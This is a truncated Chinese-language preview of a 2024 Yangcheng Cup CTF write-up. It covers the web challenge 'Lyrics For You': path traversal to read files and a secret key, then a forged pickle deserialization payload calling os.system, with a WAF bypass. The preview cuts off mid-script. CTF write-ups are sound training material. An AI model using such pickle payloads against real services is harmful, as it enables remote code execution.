羊城杯 · 2024 WriteUp

文章预览

点击蓝字 关注我们 声明 本文作者：CTF战队 本文字数：150369字 阅读时长：约50分钟 附件/链接 ：点击查看原文下载 本文属于【狼组安全社区】原创奖励计划，未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经狼组安全团队允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。 ❝ 羊城杯 · 2024 https://2024ycb.dasctf.com WEB Lyrics For You python 的 3.10.7 目录穿越任意文件读 读源码 读密钥 打pickle 伪造user数据来打pickle bypass 一下 waf # -*-coding:utf-8-*- import  pickle import  base64 a =  b"""(cos system S'sleep ………………………………